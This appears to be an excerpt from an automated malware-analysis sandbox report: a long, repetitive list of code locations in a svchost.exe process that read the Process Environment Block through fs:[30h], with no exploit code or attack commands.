Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03934260 mov eax, dword ptr fs:[00000030h]	1_2_03934260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03934260 mov eax, dword ptr fs:[00000030h]	1_2_03934260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392826B mov eax, dword ptr fs:[00000030h]	1_2_0392826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B019F mov eax, dword ptr fs:[00000030h]	1_2_039B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B019F mov eax, dword ptr fs:[00000030h]	1_2_039B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B019F mov eax, dword ptr fs:[00000030h]	1_2_039B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B019F mov eax, dword ptr fs:[00000030h]	1_2_039B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392A197 mov eax, dword ptr fs:[00000030h]	1_2_0392A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392A197 mov eax, dword ptr fs:[00000030h]	1_2_0392A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392A197 mov eax, dword ptr fs:[00000030h]	1_2_0392A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03970185 mov eax, dword ptr fs:[00000030h]	1_2_03970185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039EC188 mov eax, dword ptr fs:[00000030h]	1_2_039EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039EC188 mov eax, dword ptr fs:[00000030h]	1_2_039EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A061E5 mov eax, dword ptr fs:[00000030h]	1_2_03A061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_039AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_039AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039AE1D0 mov ecx, dword ptr fs:[00000030h]	1_2_039AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_039AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_039AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F61C3 mov eax, dword ptr fs:[00000030h]	1_2_039F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F61C3 mov eax, dword ptr fs:[00000030h]	1_2_039F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039601F8 mov eax, dword ptr fs:[00000030h]	1_2_039601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039DA118 mov ecx, dword ptr fs:[00000030h]	1_2_039DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039DA118 mov eax, dword ptr fs:[00000030h]	1_2_039DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039DA118 mov eax, dword ptr fs:[00000030h]	1_2_039DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039DA118 mov eax, dword ptr fs:[00000030h]	1_2_039DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F0115 mov eax, dword ptr fs:[00000030h]	1_2_039F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03960124 mov eax, dword ptr fs:[00000030h]	1_2_03960124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392C156 mov eax, dword ptr fs:[00000030h]	1_2_0392C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039C8158 mov eax, dword ptr fs:[00000030h]	1_2_039C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03936154 mov eax, dword ptr fs:[00000030h]	1_2_03936154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03936154 mov eax, dword ptr fs:[00000030h]	1_2_03936154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039C4144 mov eax, dword ptr fs:[00000030h]	1_2_039C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039C4144 mov eax, dword ptr fs:[00000030h]	1_2_039C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039C4144 mov ecx, dword ptr fs:[00000030h]	1_2_039C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039C4144 mov eax, dword ptr fs:[00000030h]	1_2_039C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039C4144 mov eax, dword ptr fs:[00000030h]	1_2_039C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393208A mov eax, dword ptr fs:[00000030h]	1_2_0393208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F60B8 mov eax, dword ptr fs:[00000030h]	1_2_039F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F60B8 mov ecx, dword ptr fs:[00000030h]	1_2_039F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039C80A8 mov eax, dword ptr fs:[00000030h]	1_2_039C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B20DE mov eax, dword ptr fs:[00000030h]	1_2_039B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392C0F0 mov eax, dword ptr fs:[00000030h]	1_2_0392C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039720F0 mov ecx, dword ptr fs:[00000030h]	1_2_039720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392A0E3 mov ecx, dword ptr fs:[00000030h]	1_2_0392A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039380E9 mov eax, dword ptr fs:[00000030h]	1_2_039380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B60E0 mov eax, dword ptr fs:[00000030h]	1_2_039B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394E016 mov eax, dword ptr fs:[00000030h]	1_2_0394E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394E016 mov eax, dword ptr fs:[00000030h]	1_2_0394E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394E016 mov eax, dword ptr fs:[00000030h]	1_2_0394E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394E016 mov eax, dword ptr fs:[00000030h]	1_2_0394E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B4000 mov ecx, dword ptr fs:[00000030h]	1_2_039B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039C6030 mov eax, dword ptr fs:[00000030h]	1_2_039C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392A020 mov eax, dword ptr fs:[00000030h]	1_2_0392A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392C020 mov eax, dword ptr fs:[00000030h]	1_2_0392C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03932050 mov eax, dword ptr fs:[00000030h]	1_2_03932050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B6050 mov eax, dword ptr fs:[00000030h]	1_2_039B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395C073 mov eax, dword ptr fs:[00000030h]	1_2_0395C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039307AF mov eax, dword ptr fs:[00000030h]	1_2_039307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393C7C0 mov eax, dword ptr fs:[00000030h]	1_2_0393C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B07C3 mov eax, dword ptr fs:[00000030h]	1_2_039B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039347FB mov eax, dword ptr fs:[00000030h]	1_2_039347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039347FB mov eax, dword ptr fs:[00000030h]	1_2_039347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039527ED mov eax, dword ptr fs:[00000030h]	1_2_039527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039527ED mov eax, dword ptr fs:[00000030h]	1_2_039527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039527ED mov eax, dword ptr fs:[00000030h]	1_2_039527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039BE7E1 mov eax, dword ptr fs:[00000030h]	1_2_039BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03930710 mov eax, dword ptr fs:[00000030h]	1_2_03930710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03960710 mov eax, dword ptr fs:[00000030h]	1_2_03960710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396C700 mov eax, dword ptr fs:[00000030h]	1_2_0396C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396273C mov eax, dword ptr fs:[00000030h]	1_2_0396273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396273C mov ecx, dword ptr fs:[00000030h]	1_2_0396273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396273C mov eax, dword ptr fs:[00000030h]	1_2_0396273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039AC730 mov eax, dword ptr fs:[00000030h]	1_2_039AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396C720 mov eax, dword ptr fs:[00000030h]	1_2_0396C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396C720 mov eax, dword ptr fs:[00000030h]	1_2_0396C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03930750 mov eax, dword ptr fs:[00000030h]	1_2_03930750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039BE75D mov eax, dword ptr fs:[00000030h]	1_2_039BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03972750 mov eax, dword ptr fs:[00000030h]	1_2_03972750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03972750 mov eax, dword ptr fs:[00000030h]	1_2_03972750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B4755 mov eax, dword ptr fs:[00000030h]	1_2_039B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396674D mov esi, dword ptr fs:[00000030h]	1_2_0396674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396674D mov eax, dword ptr fs:[00000030h]	1_2_0396674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396674D mov eax, dword ptr fs:[00000030h]	1_2_0396674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03938770 mov eax, dword ptr fs:[00000030h]	1_2_03938770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]	1_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]	1_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]	1_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]	1_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]	1_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]	1_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]	1_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]	1_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]	1_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]	1_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]	1_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]	1_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03934690 mov eax, dword ptr fs:[00000030h]	1_2_03934690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03934690 mov eax, dword ptr fs:[00000030h]	1_2_03934690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039666B0 mov eax, dword ptr fs:[00000030h]	1_2_039666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396C6A6 mov eax, dword ptr fs:[00000030h]	1_2_0396C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396A6C7 mov ebx, dword ptr fs:[00000030h]	1_2_0396A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396A6C7 mov eax, dword ptr fs:[00000030h]	1_2_0396A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_039AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_039AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_039AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_039AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B06F1 mov eax, dword ptr fs:[00000030h]	1_2_039B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B06F1 mov eax, dword ptr fs:[00000030h]	1_2_039B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03972619 mov eax, dword ptr fs:[00000030h]	1_2_03972619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039AE609 mov eax, dword ptr fs:[00000030h]	1_2_039AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]	1_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]	1_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]	1_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]	1_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]	1_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]	1_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]	1_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394E627 mov eax, dword ptr fs:[00000030h]	1_2_0394E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03966620 mov eax, dword ptr fs:[00000030h]	1_2_03966620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03968620 mov eax, dword ptr fs:[00000030h]	1_2_03968620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393262C mov eax, dword ptr fs:[00000030h]	1_2_0393262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394C640 mov eax, dword ptr fs:[00000030h]	1_2_0394C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03962674 mov eax, dword ptr fs:[00000030h]	1_2_03962674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F866E mov eax, dword ptr fs:[00000030h]	1_2_039F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F866E mov eax, dword ptr fs:[00000030h]	1_2_039F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396A660 mov eax, dword ptr fs:[00000030h]	1_2_0396A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396A660 mov eax, dword ptr fs:[00000030h]	1_2_0396A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396E59C mov eax, dword ptr fs:[00000030h]	1_2_0396E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03932582 mov eax, dword ptr fs:[00000030h]	1_2_03932582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03932582 mov ecx, dword ptr fs:[00000030h]	1_2_03932582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03964588 mov eax, dword ptr fs:[00000030h]	1_2_03964588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039545B1 mov eax, dword ptr fs:[00000030h]	1_2_039545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039545B1 mov eax, dword ptr fs:[00000030h]	1_2_039545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B05A7 mov eax, dword ptr fs:[00000030h]	1_2_039B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B05A7 mov eax, dword ptr fs:[00000030h]	1_2_039B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B05A7 mov eax, dword ptr fs:[00000030h]	1_2_039B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039365D0 mov eax, dword ptr fs:[00000030h]	1_2_039365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396A5D0 mov eax, dword ptr fs:[00000030h]	1_2_0396A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396A5D0 mov eax, dword ptr fs:[00000030h]	1_2_0396A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396E5CF mov eax, dword ptr fs:[00000030h]	1_2_0396E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396E5CF mov eax, dword ptr fs:[00000030h]	1_2_0396E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039325E0 mov eax, dword ptr fs:[00000030h]	1_2_039325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396C5ED mov eax, dword ptr fs:[00000030h]	1_2_0396C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396C5ED mov eax, dword ptr fs:[00000030h]	1_2_0396C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039C6500 mov eax, dword ptr fs:[00000030h]	1_2_039C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]	1_2_03A04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]	1_2_03A04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]	1_2_03A04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]	1_2_03A04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]	1_2_03A04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]	1_2_03A04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]	1_2_03A04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]	1_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]	1_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]	1_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]	1_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]	1_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]	1_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]	1_2_0395E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]	1_2_0395E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]	1_2_0395E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]	1_2_0395E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]	1_2_0395E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03938550 mov eax, dword ptr fs:[00000030h]	1_2_03938550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03938550 mov eax, dword ptr fs:[00000030h]	1_2_03938550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396656A mov eax, dword ptr fs:[00000030h]	1_2_0396656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396656A mov eax, dword ptr fs:[00000030h]	1_2_0396656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396656A mov eax, dword ptr fs:[00000030h]	1_2_0396656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039644B0 mov ecx, dword ptr fs:[00000030h]	1_2_039644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039BA4B0 mov eax, dword ptr fs:[00000030h]	1_2_039BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039364AB mov eax, dword ptr fs:[00000030h]	1_2_039364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039304E5 mov ecx, dword ptr fs:[00000030h]	1_2_039304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03968402 mov eax, dword ptr fs:[00000030h]	1_2_03968402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03968402 mov eax, dword ptr fs:[00000030h]	1_2_03968402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03968402 mov eax, dword ptr fs:[00000030h]	1_2_03968402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392E420 mov eax, dword ptr fs:[00000030h]	1_2_0392E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392E420 mov eax, dword ptr fs:[00000030h]	1_2_0392E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392E420 mov eax, dword ptr fs:[00000030h]	1_2_0392E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392C427 mov eax, dword ptr fs:[00000030h]	1_2_0392C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]	1_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]	1_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]	1_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]	1_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]	1_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]	1_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]	1_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392645D mov eax, dword ptr fs:[00000030h]	1_2_0392645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395245A mov eax, dword ptr fs:[00000030h]	1_2_0395245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]	1_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]	1_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]	1_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]	1_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]	1_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]	1_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]	1_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]	1_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395A470 mov eax, dword ptr fs:[00000030h]	1_2_0395A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395A470 mov eax, dword ptr fs:[00000030h]	1_2_0395A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395A470 mov eax, dword ptr fs:[00000030h]	1_2_0395A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039BC460 mov ecx, dword ptr fs:[00000030h]	1_2_039BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03940BBE mov eax, dword ptr fs:[00000030h]	1_2_03940BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03940BBE mov eax, dword ptr fs:[00000030h]	1_2_03940BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039DEBD0 mov eax, dword ptr fs:[00000030h]	1_2_039DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03950BCB mov eax, dword ptr fs:[00000030h]	1_2_03950BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03950BCB mov eax, dword ptr fs:[00000030h]	1_2_03950BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03950BCB mov eax, dword ptr fs:[00000030h]	1_2_03950BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03930BCD mov eax, dword ptr fs:[00000030h]	1_2_03930BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03930BCD mov eax, dword ptr fs:[00000030h]	1_2_03930BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03930BCD mov eax, dword ptr fs:[00000030h]	1_2_03930BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03938BF0 mov eax, dword ptr fs:[00000030h]	1_2_03938BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03938BF0 mov eax, dword ptr fs:[00000030h]	1_2_03938BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03938BF0 mov eax, dword ptr fs:[00000030h]	1_2_03938BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395EBFC mov eax, dword ptr fs:[00000030h]	1_2_0395EBFC
